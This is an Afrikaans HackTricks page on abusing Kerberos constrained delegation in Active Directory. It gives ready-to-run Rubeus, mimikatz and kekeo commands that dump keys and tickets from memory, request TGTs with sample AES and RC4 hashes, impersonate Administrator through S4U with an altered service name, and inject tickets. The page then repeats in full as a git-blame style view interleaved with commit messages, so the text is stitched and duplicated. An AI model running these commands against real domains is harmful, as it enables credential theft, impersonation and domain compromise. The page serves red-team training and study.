hacktricks/windows-hardening/active-directory-methodology/constrained-delegation.md

# Beperkte Afvaardiging

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Beperkte Afvaardiging

Deur dit kan 'n Domein admin **toelaat** dat 'n rekenaar **'n gebruiker of rekenaar naboots** teen 'n **diens** van 'n masjien.

* **Diens vir Gebruiker om self (**_**S4U2self**_**):** As 'n **diensrekening** 'n _userAccountControl_ waarde het wat [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D) bevat, kan dit 'n TGS vir homself (die diens) verkry namens enige ander gebruiker.
* **Diens vir Gebruiker om Proxy(**_**S4U2proxy**_**):** 'n **diensrekening** kan 'n TGS verkry namens enige gebruiker na die diens wat in **msDS-AllowedToDelegateTo** gestel is. Om dit te doen, benodig dit eers 'n TGS van daardie gebruiker na homself, maar dit kan S4U2self gebruik om daardie TGS te verkry voordat dit die ander een aanvra.

**Let wel**: As 'n gebruiker gemerk is as ‘_Rekening is sensitief en kan nie afgevaardig word_’ in AD, sal jy **nie in staat wees om** hulle na te boots nie.

Dit beteken dat as jy **die hash van die diens** kompromitteer, jy **gebruikers kan naboots** en **toegang** namens hulle tot die **diens geconfigureer** (moontlike **privesc**).

Boonop, jy **sal nie net toegang hê tot die diens wat die gebruiker kan naboots nie, maar ook tot enige diens** omdat die SPN (die diensnaam wat aangevra word) nie nagegaan word nie, net voorregte. Daarom, as jy toegang het tot **CIFS diens** kan jy ook toegang hê tot **HOST diens** deur die `/altservice` vlag in Rubeus te gebruik.

Ook, **LDAP diens toegang op DC**, is wat nodig is om 'n **DCSync** te benut.

{% code title="Enumerate" %}
```bash
# Powerview
Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto

#ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
```
{% endcode %}

{% code title="Kry TGT" %}
```bash
# The first step is to get a TGT of the service that can impersonate others
## If you are SYSTEM in the server, you might take it from memory
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
## Get AES/RC4 with mimikatz
mimikatz sekurlsa::ekeys

## Request with aes
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap

# Request with RC4
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
```
{% endcode %}

{% hint style="warning" %}
Daar is **ander maniere om 'n TGT-tiket** of die **RC4** of **AES256** te verkry sonder om SYSTEM op die rekenaar te wees, soos die Printer Bug en onbeperkte delegasie, NTLM relaying en Active Directory Certificate Service misbruik.

**Net om daardie TGT-tiket (of gehasht) te hê, kan jy hierdie aanval uitvoer sonder om die hele rekenaar te kompromitteer.**
{% endhint %}

{% code title="Using Rubeus" %}
```bash
#Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator

#Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS

#Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST

# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2)
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap

#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
```
{% endcode %}

{% code title="kekeo + Mimikatz" %}
```bash
#Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d

#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL

#Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
```
{% endcode %}

[**Meer inligting in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								# Beperkte Afvaardiging
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								{% hint style="success" %}
 								Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								<summary>Ondersteun HackTricks</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
 								* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								## Beperkte Afvaardiging
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								Deur dit kan 'n Domein admin **toelaat** dat 'n rekenaar **'n gebruiker of rekenaar naboots** teen 'n **diens** van 'n masjien.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								* **Diens vir Gebruiker om self (**_**S4U2self**_**):** As 'n **diensrekening** 'n _userAccountControl_ waarde het wat [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D) bevat, kan dit 'n TGS vir homself (die diens) verkry namens enige ander gebruiker.
 								* **Diens vir Gebruiker om Proxy(**_**S4U2proxy**_**):** 'n **diensrekening** kan 'n TGS verkry namens enige gebruiker na die diens wat in **msDS-AllowedToDelegateTo** gestel is. Om dit te doen, benodig dit eers 'n TGS van daardie gebruiker na homself, maar dit kan S4U2self gebruik om daardie TGS te verkry voordat dit die ander een aanvra.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								**Let wel**: As 'n gebruiker gemerk is as ‘_Rekening is sensitief en kan nie afgevaardig word_’ in AD, sal jy **nie in staat wees om** hulle na te boots nie.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								Dit beteken dat as jy **die hash van die diens** kompromitteer, jy **gebruikers kan naboots** en **toegang** namens hulle tot die **diens geconfigureer** (moontlike **privesc**).
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								Boonop, jy **sal nie net toegang hê tot die diens wat die gebruiker kan naboots nie, maar ook tot enige diens** omdat die SPN (die diensnaam wat aangevra word) nie nagegaan word nie, net voorregte. Daarom, as jy toegang het tot **CIFS diens** kan jy ook toegang hê tot **HOST diens** deur die `/altservice` vlag in Rubeus te gebruik.
-												GitBook: [#3381] No subject

											
										
										
											2022-08-14 19:23:50 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								Ook, **LDAP diens toegang op DC**, is wat nodig is om 'n **DCSync** te benut.
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
 								{% code title="Enumerate" %}
-												GitBook: [#3383] No subject

											
										
										
											2022-08-14 20:13:42 +00:00
+								```bash
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								# Powerview
-												GitBook: [#3455] No subject

											
										
										
											2022-09-04 09:37:14 +00:00
+								Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
 								Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
 								#ADSearch
 								ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
-												GitBook: [#3383] No subject

											
										
										
											2022-08-14 20:13:42 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								{% endcode %}
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								{% code title="Kry TGT" %}
-												GitBook: [#3455] No subject

											
										
										
											2022-09-04 09:37:14 +00:00
+								```bash
 								# The first step is to get a TGT of the service that can impersonate others
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								## If you are SYSTEM in the server, you might take it from memory
 								.\Rubeus.exe triage
 								.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
 								# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
 								## Get AES/RC4 with mimikatz
 								mimikatz sekurlsa::ekeys
 								## Request with aes
-												GitBook: [#3455] No subject

											
										
										
											2022-09-04 09:37:14 +00:00
+								tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
 								.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
 								# Request with RC4
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
-												GitBook: [#3455] No subject

											
										
										
											2022-09-04 09:37:14 +00:00
+								.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
 								```
 								{% endcode %}
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
 								{% hint style="warning" %}
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								Daar is **ander maniere om 'n TGT-tiket** of die **RC4** of **AES256** te verkry sonder om SYSTEM op die rekenaar te wees, soos die Printer Bug en onbeperkte delegasie, NTLM relaying en Active Directory Certificate Service misbruik.
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								**Net om daardie TGT-tiket (of gehasht) te hê, kan jy hierdie aanval uitvoer sonder om die hele rekenaar te kompromitteer.**
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								{% endhint %}
-												GitBook: [#3383] No subject

											
										
										
											2022-08-14 20:13:42 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								{% code title="Using Rubeus" %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Obtain a TGS of the Administrator user to self
 								.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#Obtain service TGS impersonating Administrator (CIFS)
 								.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#Impersonate Administrator on different service (HOST)
 								.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
 								# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2)
-												GitBook: [#3455] No subject

											
										
										
											2022-09-04 09:37:14 +00:00
+								.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#Load ticket in memory
 								.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								{% endcode %}
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								{% code title="kekeo + Mimikatz" %}
 								```bash
 								#Obtain a TGT for the Constained allowed user
 								tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
 								#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
 								tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
 								#Load the TGS in memory
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```
 								{% endcode %}
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								[**Meer inligting in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								{% hint style="success" %}
 								Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								<summary>Ondersteun HackTricks</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
 								* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:16:39 +00:00
+								{% endhint %}